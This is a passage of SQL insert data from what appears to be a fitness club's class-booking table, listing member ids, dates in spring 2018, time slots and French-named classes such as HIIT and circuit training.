(12804, 301, 'CTR', '2018-04-30', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12803, 301, 'CTR', '2018-04-30', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12802, 297, 'CTR', '2018-04-30', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12801, 297, 'CTR', '2018-04-30', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12800, 265, 'CTR', '2018-04-30', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12799, 265, 'CTR', '2018-04-30', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12877, 294, 'CTR', '2018-05-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12878, 294, 'CTR', '2018-05-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12796, 80, 'CTR', '2018-04-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12795, 80, 'CTR', '2018-04-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12794, 356, 'CTR', '2018-04-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12793, 356, 'CTR', '2018-04-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12792, 297, 'CTR', '2018-04-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12791, 297, 'CTR', '2018-04-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12790, 281, 'CTR', '2018-04-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12789, 281, 'CTR', '2018-04-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12788, 265, 'CTR', '2018-04-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12787, 265, 'CTR', '2018-04-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12786, 306, 'CTR', '2018-04-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12785, 306, 'CTR', '2018-04-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12784, 301, 'CTR', '2018-04-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12783, 301, 'CTR', '2018-04-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12782, 312, 'CTR', '2018-04-23', '17h30', '18h00', 'Circuit Training'),
(12781, 349, 'CTR', '2018-04-23', '17h30', '18h00', 'Circuit Training'),
(12780, 231, 'CTR', '2018-04-23', '17h30', '18h00', 'Circuit Training'),
(12779, 355, 'CTR', '2018-04-23', '17h30', '18h00', 'Circuit Training'),
(12778, 337, 'CTR', '2018-04-23', '17h30', '18h00', 'Circuit Training'),
(12776, 351, 'CTR', '2018-04-23', '17h30', '18h00', 'Circuit Training'),
(12777, 350, 'CTR', '2018-04-23', '17h30', '18h00', 'Circuit Training'),
(12775, 48, 'CTR', '2018-04-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12774, 48, 'CTR', '2018-04-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12773, 279, 'CTR', '2018-04-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12772, 279, 'CTR', '2018-04-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12771, 294, 'CTR', '2018-04-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12770, 344, 'CTR', '2018-04-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12769, 300, 'CTR', '2018-04-23', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12768, 300, 'CTR', '2018-04-23', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12767, 344, 'CTR', '2018-04-25', '20h30', '21h00', 'Circuit training'),
(12766, 344, 'CTR', '2018-04-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12763, 105, 'CTR', '2018-04-26', '18h45', '19h15', 'Circuit Training'),
(12762, 255, 'CTR', '2018-04-23', '17h30', '18h00', 'Circuit Training'),
(12761, 345, 'CTR', '2018-04-19', '12h45', '13h15', 'Circuit Training'),
(12760, 312, 'CTR', '2018-04-19', '12h45', '13h15', 'Circuit Training'),
(12829, 31, 'CTR', '2018-04-25', '18h45', '19h15', 'Circuit training'),
(12830, 278, 'CTR', '2018-04-26', '18h45', '19h15', 'Circuit Training'),
(12756, 48, 'CTR', '2018-04-25', '18h45', '19h15', 'Circuit training'),
(12759, 189, 'CTR', '2018-04-19', '12h45', '13h15', 'Circuit Training'),
(12754, 230, 'CTR', '2018-04-25', '18h45', '19h15', 'Circuit training'),
(12753, 173, 'CTR', '2018-04-25', '18h45', '19h15', 'Circuit training'),
(12752, 310, 'CTR', '2018-04-25', '18h45', '19h15', 'Circuit training'),
(12751, 247, 'CTR', '2018-04-25', '18h45', '19h15', 'Circuit training'),
(12750, 318, 'CTR', '2018-04-25', '18h45', '19h15', 'Circuit training'),
(12749, 231, 'CTR', '2018-04-25', '18h00', '18h30', 'Circuit Training'),
(12748, 350, 'CTR', '2018-04-25', '18h00', '18h30', 'Circuit Training'),
(12747, 48, 'CTR', '2018-04-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12733, 231, 'CTR', '2018-04-18', '18h00', '18h30', 'Circuit Training'),
(12745, 180, 'CTR', '2018-04-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12746, 261, 'CTR', '2018-04-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12743, 210, 'CTR', '2018-04-19', '18h45', '19h15', 'Circuit Training'),
(12744, 3, 'CTR', '2018-04-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12741, 165, 'CTR', '2018-04-18', '20h30', '21h00', 'Circuit training'),
(12740, 323, 'CTR', '2018-04-18', '20h30', '21h00', 'Circuit training'),
(12739, 310, 'CTR', '2018-04-18', '18h45', '19h15', 'Circuit training'),
(12738, 348, 'CTR', '2018-04-18', '18h45', '19h15', 'Circuit training'),
(12736, 318, 'CTR', '2018-04-18', '18h45', '19h15', 'Circuit training'),
(12735, 230, 'CTR', '2018-04-18', '18h45', '19h15', 'Circuit training'),
(12732, 350, 'CTR', '2018-04-18', '18h00', '18h30', 'Circuit Training'),
(12728, 329, 'CTR', '2018-04-19', '18h45', '19h15', 'Circuit Training'),
(12729, 308, 'CTR', '2018-04-19', '18h45', '19h15', 'Circuit Training'),
(12725, 105, 'CTR', '2018-04-19', '18h45', '19h15', 'Circuit Training'),
(12723, 306, 'CTR', '2018-04-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12702, 294, 'CTR', '2018-04-11', '20h30', '21h00', 'Circuit training'),
(12708, 48, 'CTR', '2018-04-13', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12722, 306, 'CTR', '2018-04-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12721, 301, 'CTR', '2018-04-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12720, 301, 'CTR', '2018-04-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12719, 349, 'CTR', '2018-04-16', '17h30', '18h00', 'Circuit Training'),
(12718, 351, 'CTR', '2018-04-16', '17h30', '18h00', 'Circuit Training'),
(12765, 344, 'CTR', '2018-04-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12715, 324, 'CTR', '2018-04-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12714, 48, 'CTR', '2018-04-18', '18h45', '19h15', 'Circuit training'),
(12712, 344, 'CTR', '2018-04-18', '20h30', '21h00', 'Circuit training'),
(12713, 344, 'CTR', '2018-04-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12711, 344, 'CTR', '2018-04-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12710, 344, 'CTR', '2018-04-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12717, 355, 'CTR', '2018-04-16', '17h30', '18h00', 'Circuit Training'),
(12701, 329, 'CTR', '2018-04-12', '18h45', '19h15', 'Circuit Training'),
(12700, 308, 'CTR', '2018-04-12', '18h45', '19h15', 'Circuit Training'),
(12705, 205, 'CTR', '2018-04-11', '18h00', '18h30', 'Circuit Training'),
(12707, 140, 'CTR', '2018-04-11', '17h15', '18h00', 'Circuit Training'),
(12703, 138, 'CTR', '2018-04-11', '18h00', '18h30', 'Circuit Training'),
(12696, 348, 'CTR', '2018-04-11', '18h45', '19h15', 'Circuit training'),
(12695, 348, 'CTR', '2018-04-11', '18h45', '19h15', 'Circuit training'),
(12704, 177, 'CTR', '2018-04-11', '18h00', '18h30', 'Circuit Training'),
(12706, 338, 'CTR', '2018-04-11', '17h15', '18h00', 'Circuit Training'),
(12691, 173, 'CTR', '2018-04-11', '18h45', '19h15', 'Circuit training'),
(12694, 310, 'CTR', '2018-04-11', '18h45', '19h15', 'Circuit training'),
(12693, 247, 'CTR', '2018-04-11', '18h45', '19h15', 'Circuit training'),
(12692, 339, 'CTR', '2018-04-11', '18h45', '19h15', 'Circuit training'),
(12688, 349, 'CTR', '2018-04-11', '18h00', '18h30', 'Circuit Training'),
(12687, 231, 'CTR', '2018-04-11', '18h00', '18h30', 'Circuit Training'),
(12681, 3, 'CTR', '2018-04-13', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12686, 350, 'CTR', '2018-04-11', '18h00', '18h30', 'Circuit Training'),
(13453, 231, 'CTR', '2018-07-11', '18h30', '19h30', 'Circuit Training Outdoor'),
(12684, 323, 'CTR', '2018-04-11', '20h30', '21h00', 'Circuit training'),
(12683, 353, 'CTR', '2018-04-11', '20h30', '21h00', 'Circuit training'),
(12682, 354, 'CTR', '2018-04-11', '20h30', '21h00', 'Circuit training'),
(12680, 180, 'CTR', '2018-04-13', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12679, 311, 'CTR', '2018-04-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12678, 311, 'CTR', '2018-04-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12677, 337, 'CTR', '2018-04-16', '17h30', '18h00', 'Circuit Training'),
(12676, 255, 'CTR', '2018-04-16', '17h30', '18h00', 'Circuit Training'),
(12675, 138, 'CTR', '2018-04-16', '17h30', '18h00', 'Circuit Training'),
(12674, 231, 'CTR', '2018-04-16', '17h30', '18h00', 'Circuit Training'),
(12673, 350, 'CTR', '2018-04-16', '17h30', '18h00', 'Circuit Training'),
(12672, 132, 'CTR', '2018-04-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12671, 132, 'CTR', '2018-04-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12670, 48, 'CTR', '2018-04-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12669, 48, 'CTR', '2018-04-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12668, 281, 'CTR', '2018-04-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12667, 281, 'CTR', '2018-04-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12666, 297, 'CTR', '2018-04-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12665, 297, 'CTR', '2018-04-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12664, 265, 'CTR', '2018-04-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12657, 324, 'CTR', '2018-04-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12656, 279, 'CTR', '2018-04-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12655, 279, 'CTR', '2018-04-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12654, 344, 'CTR', '2018-04-13', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12653, 294, 'CTR', '2018-04-25', '20h30', '21h00', 'Circuit training'),
(12764, 294, 'CTR', '2018-04-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12651, 294, 'CTR', '2018-04-20', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12731, 294, 'CTR', '2018-04-18', '18h45', '19h15', 'Circuit training'),
(12649, 325, 'CTR', '2018-04-12', '18h45', '19h15', 'Circuit Training'),
(12645, 326, 'CTR', '2018-04-12', '18h45', '19h15', 'Circuit Training'),
(12646, 342, 'CTR', '2018-04-12', '18h45', '19h15', 'Circuit Training'),
(12648, 105, 'CTR', '2018-04-12', '18h45', '19h15', 'Circuit Training'),
(12647, 322, 'CTR', '2018-04-12', '18h45', '19h15', 'Circuit Training'),
(12644, 3, 'CTR', '2018-04-06', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12643, 323, 'CTR', '2018-04-04', '20h30', '21h00', 'Circuit training'),
(12642, 165, 'CTR', '2018-04-04', '20h30', '21h00', 'Circuit training'),
(12641, 324, 'CTR', '2018-04-04', '18h00', '18h30', 'Circuit Training'),
(12640, 231, 'CTR', '2018-04-04', '18h00', '18h30', 'Circuit Training'),
(12639, 350, 'CTR', '2018-04-04', '18h00', '18h30', 'Circuit Training'),
(12638, 349, 'CTR', '2018-04-04', '18h00', '18h30', 'Circuit Training'),
(12637, 339, 'CTR', '2018-04-04', '18h45', '19h15', 'Circuit training'),
(12633, 48, 'CTR', '2018-04-05', '18h45', '19h15', 'Circuit Training'),
(12634, 294, 'CTR', '2018-04-12', '18h45', '19h15', 'Circuit Training'),
(12628, 329, 'CTR', '2018-04-05', '18h45', '19h15', 'Circuit Training'),
(12627, 48, 'CTR', '2018-04-04', '18h45', '19h15', 'Circuit training'),
(12626, 308, 'CTR', '2018-04-05', '18h45', '19h15', 'Circuit Training'),
(12625, 90, 'CTR', '2018-04-04', '20h30', '21h00', 'Circuit training'),
(12624, 180, 'CTR', '2018-04-04', '17h15', '18h00', 'Circuit Training'),
(12623, 205, 'CTR', '2018-04-04', '17h15', '18h00', 'Circuit Training'),
(12622, 177, 'CTR', '2018-04-04', '17h15', '18h00', 'Circuit Training'),
(12629, 294, 'CTR', '2018-04-04', '17h15', '18h00', 'Circuit Training'),
(12618, 132, 'CTR', '2018-04-06', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12617, 138, 'CTR', '2018-04-04', '17h15', '18h00', 'Circuit Training'),
(12616, 344, 'CTR', '2018-04-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12615, 344, 'CTR', '2018-04-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12612, 322, 'CTR', '2018-04-05', '18h45', '19h15', 'Circuit Training'),
(12608, 261, 'CTR', '2018-03-30', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12607, 180, 'CTR', '2018-03-30', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12606, 3, 'CTR', '2018-03-30', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12611, 105, 'CTR', '2018-04-05', '18h45', '19h15', 'Circuit Training'),
(12604, 326, 'CTR', '2018-03-29', '18h45', '19h15', 'Circuit Training'),
(12663, 265, 'CTR', '2018-04-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12659, 356, 'CTR', '2018-04-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12660, 356, 'CTR', '2018-04-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12661, 80, 'CTR', '2018-04-16', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12658, 294, 'CTR', '2018-04-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12599, 80, 'CTR', '2018-04-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12598, 80, 'CTR', '2018-04-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12597, 48, 'CTR', '2018-04-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12596, 48, 'CTR', '2018-04-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12595, 311, 'CTR', '2018-04-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12594, 311, 'CTR', '2018-04-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12636, 343, 'CTR', '2018-04-05', '18h00', '18h30', 'Circuit training'),
(12631, 294, 'CTR', '2018-04-09', '17h30', '18h00', 'Circuit Training'),
(12635, 140, 'CTR', '2018-04-05', '18h00', '18h30', 'Circuit training'),
(12591, 231, 'CTR', '2018-04-09', '17h30', '18h00', 'Circuit Training'),
(12590, 255, 'CTR', '2018-04-09', '17h30', '18h00', 'Circuit Training'),
(12589, 138, 'CTR', '2018-04-09', '17h30', '18h00', 'Circuit Training'),
(12588, 350, 'CTR', '2018-04-09', '17h30', '18h00', 'Circuit Training'),
(12587, 349, 'CTR', '2018-04-09', '17h30', '18h00', 'Circuit Training'),
(12586, 351, 'CTR', '2018-04-09', '17h30', '18h00', 'Circuit Training'),
(12585, 337, 'CTR', '2018-04-09', '17h30', '18h00', 'Circuit Training'),
(12662, 80, 'CTR', '2018-04-16', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12582, 140, 'CTR', '2018-03-28', '18h00', '18h30', 'Circuit Training'),
(12581, 343, 'CTR', '2018-03-28', '18h00', '18h30', 'Circuit Training'),
(12577, 205, 'CTR', '2018-03-29', '18h45', '19h15', 'Circuit Training'),
(12578, 205, 'CTR', '2018-03-30', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12571, 346, 'CTR', '2018-03-28', '18h00', '18h30', 'Circuit Training'),
(12572, 349, 'CTR', '2018-03-28', '18h00', '18h30', 'Circuit Training'),
(12573, 350, 'CTR', '2018-03-28', '18h00', '18h30', 'Circuit Training'),
(12574, 311, 'CTR', '2018-03-28', '18h00', '18h30', 'Circuit Training'),
(12575, 195, 'CTR', '2018-03-28', '18h00', '18h30', 'Circuit Training'),
(12576, 205, 'CTR', '2018-03-28', '18h00', '18h30', 'Circuit Training'),
(12568, 31, 'CTR', '2018-03-28', '18h45', '19h15', 'Circuit training'),
(12567, 48, 'CTR', '2018-03-28', '18h45', '19h15', 'Circuit training'),
(12566, 348, 'CTR', '2018-03-28', '18h45', '19h15', 'Circuit training'),
(12565, 348, 'CTR', '2018-03-28', '18h45', '19h15', 'Circuit training'),
(12564, 318, 'CTR', '2018-03-28', '18h45', '19h15', 'Circuit training'),
(12563, 339, 'CTR', '2018-03-28', '18h45', '19h15', 'Circuit training'),
(12562, 310, 'CTR', '2018-03-28', '18h45', '19h15', 'Circuit training'),
(12561, 247, 'CTR', '2018-03-28', '18h45', '19h15', 'Circuit training'),
(12560, 90, 'CTR', '2018-03-28', '20h30', '21h00', 'Circuit training'),
(12559, 165, 'CTR', '2018-03-28', '20h30', '21h00', 'Circuit training'),
(12570, 231, 'CTR', '2018-03-28', '18h00', '18h30', 'Circuit Training'),
(12557, 323, 'CTR', '2018-03-28', '20h30', '21h00', 'Circuit training'),
(12580, 329, 'CTR', '2018-03-29', '18h45', '19h15', 'Circuit Training'),
(12579, 210, 'CTR', '2018-03-29', '18h45', '19h15', 'Circuit Training'),
(12630, 294, 'CTR', '2018-04-06', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12553, 264, 'CTR', '2018-03-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12552, 264, 'CTR', '2018-03-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12551, 80, 'CTR', '2018-03-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12550, 80, 'CTR', '2018-03-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12549, 281, 'CTR', '2018-03-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12548, 281, 'CTR', '2018-03-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12547, 306, 'CTR', '2018-03-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12546, 306, 'CTR', '2018-03-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12545, 301, 'CTR', '2018-03-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12544, 301, 'CTR', '2018-03-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12543, 297, 'CTR', '2018-03-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12542, 297, 'CTR', '2018-03-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12541, 265, 'CTR', '2018-03-26', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12540, 265, 'CTR', '2018-03-26', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12539, 311, 'CTR', '2018-03-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12538, 311, 'CTR', '2018-03-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12537, 249, 'CTR', '2018-03-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12536, 249, 'CTR', '2018-03-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12535, 132, 'CTR', '2018-03-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12534, 132, 'CTR', '2018-03-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12533, 260, 'CTR', '2018-03-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12532, 260, 'CTR', '2018-03-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12530, 304, 'CTR', '2018-03-26', '17h30', '18h00', 'Circuit Training'),
(12529, 231, 'CTR', '2018-03-26', '17h30', '18h00', 'Circuit Training'),
(12528, 337, 'CTR', '2018-03-26', '17h30', '18h00', 'Circuit Training'),
(12527, 80, 'CTR', '2018-03-26', '17h30', '18h00', 'Circuit Training'),
(12526, 351, 'CTR', '2018-03-26', '17h30', '18h00', 'Circuit Training'),
(12525, 349, 'CTR', '2018-03-26', '17h30', '18h00', 'Circuit Training'),
(12524, 350, 'CTR', '2018-03-26', '17h30', '18h00', 'Circuit Training'),
(12523, 48, 'CTR', '2018-03-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12519, 344, 'CTR', '2018-03-30', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12613, 344, 'CTR', '2018-04-04', '20h30', '21h00', 'Circuit training'),
(12614, 344, 'CTR', '2018-04-06', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12521, 294, 'CTR', '2018-03-26', '17h30', '18h00', 'Circuit Training'),
(12522, 48, 'CTR', '2018-03-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12609, 326, 'CTR', '2018-04-05', '18h45', '19h15', 'Circuit Training'),
(12610, 342, 'CTR', '2018-04-05', '18h45', '19h15', 'Circuit Training'),
(12515, 138, 'CTR', '2018-03-28', '17h15', '18h00', 'Circuit Training'),
(12514, 138, 'CTR', '2018-03-26', '17h30', '18h00', 'Circuit Training'),
(12513, 344, 'CTR', '2018-03-29', '12h45', '13h15', 'Circuit Training'),
(12512, 325, 'CTR', '2018-03-29', '18h45', '19h15', 'Circuit Training'),
(12511, 322, 'CTR', '2018-03-29', '18h45', '19h15', 'Circuit Training'),
(12510, 105, 'CTR', '2018-03-29', '18h45', '19h15', 'Circuit Training'),
(12509, 255, 'CTR', '2018-03-26', '17h30', '18h00', 'Circuit Training'),
(12508, 329, 'CTR', '2018-03-22', '18h45', '19h15', 'Circuit Training'),
(12507, 308, 'CTR', '2018-03-22', '18h45', '19h15', 'Circuit Training'),
(12505, 80, 'CTR', '2018-03-21', '20h30', '21h00', 'Circuit training'),
(12504, 177, 'CTR', '2018-03-21', '18h00', '18h30', 'Circuit Training'),
(12506, 192, 'CTR', '2018-03-22', '18h45', '19h15', 'Circuit Training'),
(12502, 312, 'CTR', '2018-03-22', '12h45', '13h15', 'Circuit Training'),
(12501, 180, 'CTR', '2018-03-21', '20h30', '21h00', 'Circuit training'),
(12500, 165, 'CTR', '2018-03-21', '20h30', '21h00', 'Circuit training'),
(12499, 323, 'CTR', '2018-03-21', '20h30', '21h00', 'Circuit training'),
(12498, 90, 'CTR', '2018-03-21', '20h30', '21h00', 'Circuit training'),
(12497, 311, 'CTR', '2018-03-21', '18h00', '18h30', 'Circuit Training'),
(12496, 231, 'CTR', '2018-03-21', '18h00', '18h30', 'Circuit Training'),
(12495, 350, 'CTR', '2018-03-21', '18h00', '18h30', 'Circuit Training'),
(12494, 349, 'CTR', '2018-03-21', '18h00', '18h30', 'Circuit Training'),
(12493, 339, 'CTR', '2018-03-21', '18h45', '19h15', 'Circuit training'),
(12492, 348, 'CTR', '2018-03-21', '18h45', '19h15', 'Circuit training'),
(12491, 348, 'CTR', '2018-03-21', '18h45', '19h15', 'Circuit training'),
(12490, 230, 'CTR', '2018-03-21', '18h45', '19h15', 'Circuit training'),
(12489, 318, 'CTR', '2018-03-21', '18h45', '19h15', 'Circuit training'),
(12488, 310, 'CTR', '2018-03-21', '18h45', '19h15', 'Circuit training'),
(12487, 247, 'CTR', '2018-03-21', '18h45', '19h15', 'Circuit training'),
(12480, 264, 'CTR', '2018-03-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12486, 48, 'CTR', '2018-03-21', '18h45', '19h15', 'Circuit training'),
(12485, 210, 'CTR', '2018-03-22', '18h45', '19h15', 'Circuit Training'),
(12484, 344, 'CTR', '2018-03-28', '20h30', '21h00', 'Circuit training'),
(12483, 281, 'CTR', '2018-03-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12482, 281, 'CTR', '2018-03-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12481, 80, 'CTR', '0000-00-00', '12h45', '13h15', 'Circuit Training'),
(12479, 264, 'CTR', '2018-03-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12478, 306, 'CTR', '2018-03-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12477, 306, 'CTR', '2018-03-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12476, 301, 'CTR', '2018-03-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12475, 301, 'CTR', '2018-03-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12474, 297, 'CTR', '2018-03-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12473, 297, 'CTR', '2018-03-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12472, 265, 'CTR', '2018-03-19', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12471, 265, 'CTR', '2018-03-19', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12470, 344, 'CTR', '2018-03-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12469, 344, 'CTR', '2018-03-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12468, 249, 'CTR', '2018-03-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12467, 249, 'CTR', '2018-03-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12466, 260, 'CTR', '2018-03-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12465, 260, 'CTR', '2018-03-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12464, 48, 'CTR', '2018-03-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12463, 48, 'CTR', '2018-03-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12462, 311, 'CTR', '2018-03-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12461, 311, 'CTR', '2018-03-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12460, 132, 'CTR', '2018-03-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12459, 132, 'CTR', '2018-03-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12458, 304, 'CTR', '2018-03-19', '17h30', '18h00', 'Circuit Training'),
(12457, 337, 'CTR', '2018-03-19', '17h30', '18h00', 'Circuit Training'),
(12456, 351, 'CTR', '2018-03-19', '17h30', '18h00', 'Circuit Training'),
(12455, 350, 'CTR', '2018-03-19', '17h30', '18h00', 'Circuit Training'),
(12454, 349, 'CTR', '2018-03-19', '17h30', '18h00', 'Circuit Training'),
(12453, 338, 'CTR', '2018-03-19', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12450, 261, 'CTR', '2018-03-23', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12449, 230, 'CTR', '2018-03-23', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12448, 48, 'CTR', '2018-03-23', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12447, 195, 'CTR', '2018-03-23', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12446, 344, 'CTR', '2018-03-23', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12451, 231, 'CTR', '2018-03-19', '17h30', '18h00', 'Circuit Training'),
(12452, 338, 'CTR', '2018-03-19', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12444, 354, 'CTR', '2018-03-23', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12443, 325, 'CTR', '2018-03-15', '18h45', '19h15', 'Circuit Training'),
(12442, 325, 'CTR', '2018-03-22', '18h45', '19h15', 'Circuit Training'),
